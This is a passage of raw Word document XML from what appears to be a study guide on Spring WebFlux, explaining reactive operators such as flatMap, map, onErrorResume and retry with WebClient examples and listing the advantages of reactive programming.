    <w:p w14:paraId="6DBE5CD0" w14:textId="77777777" w:rsidR="00EF567A" w:rsidRPr="00B13F85" w:rsidRDefault="00EF567A"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3. doOnTerminate():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFB76CC"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When to use</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>doOnTerminate()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need to perform some action (like logging or releasing resources) after the reactive stream completes or terminates (whether with success or error).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0944DA"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 Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA349BE" w14:textId="77777777" w:rsidR="00EF567A" w:rsidRPr="00B13F85" w:rsidRDefault="00EF567A"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f you want to log when the request completes, irrespective of success or failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1550E31B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B25378F"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ebClient.get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD13DFE"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uri("/posts/1")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F441955"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rieve()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128CA67A"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bodyToMono(String.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DB4C92"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doOnTerminate(() -&gt; System.out.println("Request completed"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501543FF"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ubscribe(response -&gt; System.out.println("Response: " + response));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADE6800" w14:textId="77777777" w:rsidR="00EF567A" w:rsidRPr="00B13F85" w:rsidRDefault="00EF567A"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4. flatMap():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2148A417"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When to use</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>flatMap()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need to perform additional asynchronous operations inside your reactive chain. It allows you to flatten the result of another Mono or Flux into your existing reactive flow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACBC2E5"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 Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7600C266" w14:textId="77777777" w:rsidR="00EF567A" w:rsidRPr="00B13F85" w:rsidRDefault="00EF567A"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You need to perform another asynchronous operation based on the response of a previous operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162EC2F6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFA0D3E"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ebClient.get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DACE02"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uri("/posts/1")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361DC4F8"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rieve()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1A384F"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bodyToMono(String.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEEFCDA"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flatMap(post -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A66FBFB"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Assume another request that depends on the first one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDD9C49"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webClient.get().uri("/comments/" + post).retrieve().bodyToMono(String.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC156AB"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57268FCC"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 xml:space="preserve">         .subscribe(response -&gt; System.out.println("Comment: " + response));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D676F5B" w14:textId="77777777" w:rsidR="00EF567A" w:rsidRPr="00B13F85" w:rsidRDefault="00EF567A"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5. map():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0427E5A1"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When to use</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>map()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you want to transform the result of a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single value</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (such as from Mono) in the reactive pipeline. It is a synchronous transformation, and it doesn’t introduce additional asynchronous behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A116CD"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 Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F46AA0" w14:textId="77777777" w:rsidR="00EF567A" w:rsidRPr="00B13F85" w:rsidRDefault="00EF567A"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hen you need to modify or convert the response data (e.g., extract certain fields, transform the data) without needing to make additional asynchronous calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AB3FC9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBADCB0"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ebClient.get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B0F72C"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uri("/posts/1")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D072567"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rieve()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4632D921"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bodyToMono(String.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C09271"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map(response -&gt; response.toUpperCase())  // Synchronously transforming the response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BECF85"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ubscribe(response -&gt; System.out.println("Uppercase Response: " + response));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302BEC52" w14:textId="77777777" w:rsidR="00EF567A" w:rsidRPr="00B13F85" w:rsidRDefault="00EF567A"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6. onErrorResume():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2015D8D0"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When to use</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>onErrorResume()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to provide a fallback or a default response when an error occurs during the execution of the reactive chain. This is useful when you want to recover gracefully from errors and provide alternative behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012B60EF"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 Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78325B3B" w14:textId="77777777" w:rsidR="00EF567A" w:rsidRPr="00B13F85" w:rsidRDefault="00EF567A"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f you want to handle errors such as timeouts, 404 responses, etc., by providing a fallback response or retrying the operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE2DF4B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209D252D"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ebClient.get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A7FC86"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uri("/posts/invalid-id")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128F7DF8"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rieve()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E04C0B"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bodyToMono(String.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D1F746"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onErrorResume(e -&gt; Mono.just("Fallback Response"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A07F187"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ubscribe(response -&gt; System.out.println("Response: " + response));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC98B41" w14:textId="77777777" w:rsidR="00EF567A" w:rsidRPr="00B13F85" w:rsidRDefault="00EF567A"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7. retry():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F013D4"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When to use</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>retry()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you want to </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatically retry the operation</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in case of failure (for a certain number of attempts or based on certain conditions). This is particularly useful in scenarios where transient errors can occur, like network timeouts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50359657"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 Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D557DB" w14:textId="77777777" w:rsidR="00EF567A" w:rsidRPr="00B13F85" w:rsidRDefault="00EF567A"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hen you expect a certain level of reliability in external systems (e.g., a remote service) and want to retry on failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9834A4"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13284761"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ebClient.get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4718E0"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uri("/posts/1")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41920B89"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rieve()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD16F86"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bodyToMono(String.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB0189B"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ry(3)  // Retries 3 times in case of failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51ACE399"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ubscribe(response -&gt; System.out.println("Response: " + response));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A456FF" w14:textId="77777777" w:rsidR="00EF567A" w:rsidRPr="00B13F85" w:rsidRDefault="00EF567A"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Summary of Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAA5C7C"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ubscribe()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use for non-blocking, asynchronous actions where you don’t need to wait for the result immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AAF7F6"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block()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use when you need to block and wait for the result, usually when integrating with non-reactive code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F75609"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flatMap()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use for chaining asynchronous operations that depend on previous results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AC5D8E"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map()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use for synchronous transformations of data in the reactive pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548DE99A"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onErrorResume()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use for graceful error handling and fallback strategies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63478AB1"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try()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use for automatic retries in case of failure (e.g., network errors).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA088A9" w14:textId="77777777" w:rsidR="00EF567A" w:rsidRPr="00B13F85" w:rsidRDefault="00EF567A"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Always prefer non-blocking and asynchronous methods like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>subscribe()</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flatMap()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to maintain the non-blocking nature of reactive programming, and only use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>block()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when absolutely necessary (usually in legacy or hybrid systems).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73331621"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C7052B4">
          <v:rect id="_x0000_i2305" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1447EC08" w14:textId="6CA670B2"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11" w:name="_Toc196307991"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What are some advantages of using reactive programming in web applications</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="511"/>
    </w:p>
    <w:p w14:paraId="2C3A0BAA" w14:textId="67CA7498" w:rsidR="00DA478E" w:rsidRPr="00B13F85" w:rsidRDefault="00DA478E"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active programming offers several advantages when applied to web applications, especially in scenarios where handling high concurrency, scalability, and asynchronous tasks is crucial. Some of the key benefits include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DE3BF8" w14:textId="77777777" w:rsidR="00DA478E" w:rsidRPr="00B13F85" w:rsidRDefault="00DA47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 Non-blocking I/O:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAF704F"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Reactive programming enables </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations, meaning it does not block the execution thread while waiting for external resources (such as databases, web services, etc.). This allows your web application to handle many more concurrent requests with fewer resources compared to traditional blocking I/O models.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E747105"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If a service is waiting for a database query result, the thread is not blocked, and the server can continue processing other requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5420C36D" w14:textId="77777777" w:rsidR="00DA478E" w:rsidRPr="00B13F85" w:rsidRDefault="00DA47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2. Better Scalability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F61B1F"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Reactive systems are </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scalable by design</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because they handle asynchronous requests efficiently, which reduces the need for a large number of threads. This is particularly important in high-traffic environments where the number of concurrent requests can increase significantly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077B24AB"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With non-blocking behavior, your application can efficiently handle thousands of concurrent connections on fewer threads, which significantly improves scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3A74A3" w14:textId="77777777" w:rsidR="00DA478E" w:rsidRPr="00B13F85" w:rsidRDefault="00DA47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3. Improved Resource Utilization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9953C0"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Since reactive applications don't block threads while waiting for I/O operations (e.g., database or API calls), </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resources (CPU, memory) are used more efficiently</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This leads to better overall performance and reduces the overhead of creating and managing threads in traditional models.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482ED1FA"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A server can handle more requests with fewer resources by reusing threads instead of constantly creating new ones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473A4CDF" w14:textId="77777777" w:rsidR="00DA478E" w:rsidRPr="00B13F85" w:rsidRDefault="00DA47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4. Handling of Asynchronous Data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A3D3D1"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Reactive programming is ideal for managing streams of </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous data</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, such as events, notifications, or external data sources. It allows the system to react to changes in the data stream and perform operations when new data arrives, without blocking or waiting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0201B360"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In a real-time chat application, reactive programming ensures messages are received and displayed without waiting for previous requests to finish.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164B1111" w14:textId="77777777" w:rsidR="00DA478E" w:rsidRPr="00B13F85" w:rsidRDefault="00DA47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5. Backpressure Management:</w:t>
      </w:r>
    </w:p>
